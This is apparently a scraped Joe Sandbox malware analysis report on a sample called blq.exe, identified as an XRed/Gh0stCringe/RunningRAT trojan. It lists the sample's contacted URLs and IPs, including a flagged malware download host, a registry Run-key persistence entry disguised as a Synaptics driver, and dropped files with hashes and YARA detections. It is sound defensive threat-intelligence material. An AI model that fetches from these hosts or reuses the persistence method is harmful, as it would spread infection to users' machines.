                                                            https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.2973653259.000000001553E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2964528186.000000001047E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2956086425.000000000D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2976837212.00000000180FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3028509920.000000002B33E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/dSynaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://xred.site50.net/syn/SSLLibrary.dllblq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drtrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://docs.google.com/Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlblq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    142.250.181.1
                                                                    		drive.usercontent.google.comUnited States
                                                                    		15169GOOGLEUSfalse
                                                                    103.36.221.195
                                                                    		unknownChina
                                                                    		4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNtrue
                                                                    142.250.181.14
                                                                    		docs.google.comUnited States
                                                                    		15169GOOGLEUSfalse
                                                                    69.42.215.252
                                                                    		freedns.afraid.orgUnited States
                                                                    		17048AWKNET-LLCUSfalse

                                                                    Private

                                                                    IP
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1580529
                                                                    Start date and time:2024-12-24 22:10:10 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 45s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:25
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:blq.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.bank.troj.expl.evad.winEXE@36/50@17/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 22
                                                                    • Number of non-executed functions: 82
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 23.218.208.109, 52.113.194.132, 20.189.173.23, 20.42.73.29, 20.189.173.21, 20.231.128.66, 20.109.210.53, 13.107.246.63
                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, onedscolprdwus16.westus.cloudapp.azure.com, europe.configsvc1.live.com.akadns.net
                                                                    • Execution Graph export aborted for target Synaptics.exe, PID 7644 because there are no executed function
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                    • VT rate limit hit for: blq.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    16:11:03API Interceptor6808614x Sleep call for process: svchost.exe modified
                                                                    16:11:05API Interceptor668x Sleep call for process: Synaptics.exe modified
                                                                    16:11:44API Interceptor1430x Sleep call for process: encvbk.exe modified
                                                                    16:12:40API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                    16:13:03API Interceptor2131280x Sleep call for process: splwow64.exe modified
                                                                    21:11:04AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    69.42.215.252New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    Synaptics.exeGet hashmaliciousXRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                    P4.exeGet hashmaliciousXRedBrowse
                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    s-part-0035.t-0009.t-msedge.nethttps://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                    • 13.107.246.63
                                                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 13.107.246.63
                                                                    aYf5ibGObB.exeGet hashmaliciousRedLineBrowse
                                                                    • 13.107.246.63
                                                                    https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 13.107.246.63
                                                                    Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 13.107.246.63
                                                                    gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                                                    • 13.107.246.63
                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 13.107.246.63
                                                                    http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                    • 13.107.246.63
                                                                    https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531Get hashmaliciousUnknownBrowse
                                                                    • 13.107.246.63
                                                                    pwn.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                                                    • 13.107.246.63
                                                                    freedns.afraid.orgNew PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 69.42.215.252
                                                                    RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 69.42.215.252
                                                                    ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    Synaptics.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 69.42.215.252
                                                                    System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    P4.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    AWKNET-LLCUSNew PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 69.42.215.252
                                                                    RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 69.42.215.252
                                                                    ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    Synaptics.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 69.42.215.252
                                                                    System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    P4.exeGet hashmaliciousXRedBrowse
                                                                    • 69.42.215.252
                                                                    CHINA169-BJChinaUnicomBeijingProvinceNetworkCNloligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 124.65.32.189
                                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 111.196.171.147
                                                                    armv7l.elfGet hashmaliciousUnknownBrowse
                                                                    • 218.241.81.11
                                                                    splm68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 101.237.188.154
                                                                    splarm.elfGet hashmaliciousUnknownBrowse
                                                                    • 114.113.47.17
                                                                    jklm68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 111.193.96.20
                                                                    splspc.elfGet hashmaliciousUnknownBrowse
                                                                    • 118.247.90.216
                                                                    nklspc.elfGet hashmaliciousUnknownBrowse
                                                                    • 60.194.240.104
                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                    • 124.14.103.162
                                                                    splsh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 123.59.121.71

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    37f463bf4616ecd445d4a1937da06e19PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    installer.msiGet hashmaliciousUnknownBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    installer.msiGet hashmaliciousUnknownBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14
                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 142.250.181.1
                                                                    • 142.250.181.14

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Windows\SysWOW64\encvbk.exensdksetup.dllGet hashmaliciousUnknownBrowse
                                                                      #U63d0#U53d6Proxy.exeGet hashmaliciousGh0stCringe, Neshta, RunningRATBrowse
                                                                        #U4ee3#U7406.exeGet hashmaliciousGh0stCringe, Neshta, RunningRATBrowse
                                                                          #U63d0#U53d6Proxy (1).exeGet hashmaliciousGh0stCringe, Neshta, RunningRATBrowse
                                                                            V6bBcEdp5a.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                              l10U7QN0CY.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                                KlzXRW4Ag7.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                                  ZfJheGhddq.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                                    PD5dVJNpz7.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                                                                      7YtmCkMUx3.dllGet hashmaliciousGhostRat, Mimikatz, NitolBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Program Files (x86)\6795234.dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\._cache_blq.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):26112
                                                                                        Entropy (8bit):6.076389673115769
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:8T9IWqIwt10zr6lXYhCRdkyurLmC2S1xJrQcWrH/RUAMO0MY0holUxHdAq4tKDES:8ht+Izr6pqRrLuS1vzWpaGZHd8YDG
                                                                                        MD5:0A9A34B7B8BE7680123DC29107A3EAAC
                                                                                        SHA1:883F19EFCEA8184B9D01E5AAE9455DE0B64D71EB
                                                                                        SHA-256:C105D6B7304A43BFACF713B09C01E213047AC1E9123C1723E0164CF644CB0F37
                                                                                        SHA-512:6002AB855D8C96A43D9880DE14A09E4E96D51336B4D0203A1D9470AC9FF1CF4A56FAF15C6FE62FFFC4B52970D4788EB341125D90641365F89CD6780FDAE3AB08
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: C:\Program Files (x86)\6795234.dll, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Program Files (x86)\6795234.dll, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........d...d...d..#G...d..x...d..{...d..zx...d..{...d..{...d...d...d...d..d..:k...d...B...d...D...d..Rich.d..........PE..L....w.T...........!.....@...$.......N.......P......................................................................pZ.......T..d............................p.......................................................P..$............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........`.......P..............@....reloc..d....p.......^..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):118
                                                                                        Entropy (8bit):3.5700810731231707
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                        MD5:573220372DA4ED487441611079B623CD
                                                                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8192
                                                                                        Entropy (8bit):0.363788168458258
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                        MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                        SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                        SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                        SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                        Malicious:false
                                                                                        Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):1.3107547669861672
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrx:KooCEYhgYEL0In
                                                                                        MD5:3AB8271F73D8DCB35D78E24EFA2BAACA
                                                                                        SHA1:9225F2941072A7EAE1291D56F6675C4A9180248B
                                                                                        SHA-256:ABC032062728A1F935FEA983B9E5AD51B18A0A361B8EB7F0F4AF8B4F729291F9
                                                                                        SHA-512:B31ECCF5302AA088DF4ABDFEEB79E00E92C6800608594993B18269226E0DBEAE88B5958CF589863C4689A95937E9A5D482112E2435BAD2399C695692B497C593
                                                                                        Malicious:false
                                                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x69339439, page size 16384, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.42225507562415393
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:vSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:vazag03A2UrzJDO
                                                                                        MD5:809910E6B8E703423CCBAC33B3B160E5
                                                                                        SHA1:B9BDE61AC0D82B23C513BA5250BB4B8362DBB0C6
                                                                                        SHA-256:93DCB8D8EF20258EAE03EE28A0C7CD85770A55C0944E04C097B4C4826EBCA818
                                                                                        SHA-512:A7D7CA4FC4C8A62FE9FE2CE39995BDB7A1248EE75D7BE7DAFC368735FA8D232E5BC28F5FFF717490B1B74BB928D8C0AD43B4AC96C3D6B0CFFAEFC407FEA4DCC0
                                                                                        Malicious:false
                                                                                        Preview:i3.9... .......Y.......X\...;...{......................n.%..........|.......|..h.#..........|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................(.......|....................#......|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.07888274310497298
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:v/lUetYeW13u0038r//lht8rSwLZ8rfUCr//lJGQrwt8r//lallOE/tlnl+/rTc:vtNzCp0Mj/TO/ObZj/JZj/ApMP
                                                                                        MD5:9E050391C1080C153966B8728C811CD2
                                                                                        SHA1:975A4F0CA105EBE88CE906747A1191D40825858C
                                                                                        SHA-256:DE069E5827D7ED1A473DEFB0CBA24F3F294B86F318D3817632CDB957DC4B3D9C
                                                                                        SHA-512:ADBC266A9D08FECA88BE9DCFABCFF8EED90F1A99D6F4A3AA654AC036785FFECF4170392826F494684520DE3B511BB978EB0BB013A1648CBDDC7A6B3CED2B6503
                                                                                        Malicious:false
                                                                                        Preview:..O......................................;...{.......|.......|...............|.......|....v.....|....................#......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_d3814cc74409fd2af9e321c811b6fc540231bc3_455b7b6e_909d9f6a-d748-4ff9-abfc-b2f6d96f2a9f\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.1336335933354542
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:wExnVpsl7tImV02k6PRDzJDzqjLOA2gFmOVzuiF5Z24IO8EKDzy:Vy5ts2k6PRJqjcqzuiF5Y4IO8zy
                                                                                        MD5:047AADF7F34C58E1C2EB207B55A7D43E
                                                                                        SHA1:40B8468BD748326529DF0614E84C7371F6D29017
                                                                                        SHA-256:A3DBB978FB5FD62DA123BDBEE07B79FEA0DBFCBFA08BB3C76F7601CD56EDACD9
                                                                                        SHA-512:8EB0780F0425CBBE12C7CE45E5915A716F19E5F132BFB6080292A49E106FDA8C19B5085DEF32526EC5CBCA21B6A654911FE41B32A1DE448851CBE6FE718D3DD0
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.4.8.3.3.7.1.3.8.0.3.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.4.8.3.5.5.7.6.3.0.3.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.d.9.f.6.a.-.d.7.4.8.-.4.f.f.9.-.a.b.f.c.-.b.2.f.6.d.9.6.f.2.a.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.4.6.e.3.5.b.-.c.1.5.a.-.4.f.6.4.-.8.0.d.7.-.8.6.8.6.f.e.2.f.b.3.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.c.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.f.8.5.4.4.8.5.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.2.4.c.7.6.9.4.e.6.c.f.1.7.6.3.c.1.a.9.8.b.d.1.a.2.7.1.5.2.b.e.d.1.e.b.f.f.8.2.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_94efb2d7-ffbf-4207-adcb-353fee3cac9e\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.1338552686139183
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:1RnVpsU7tI40Kks/kDzJDzqjLOA2gFmOVzuiF5Z24IO8EKDzy2:pyYtWKksMJqjcqzuiF5Y4IO8zy
                                                                                        MD5:9201EF94BC4D23FBC60FE4BEBCAEB64B
                                                                                        SHA1:1702FBAAA4B760075C326494EFDB38CEB80839A7
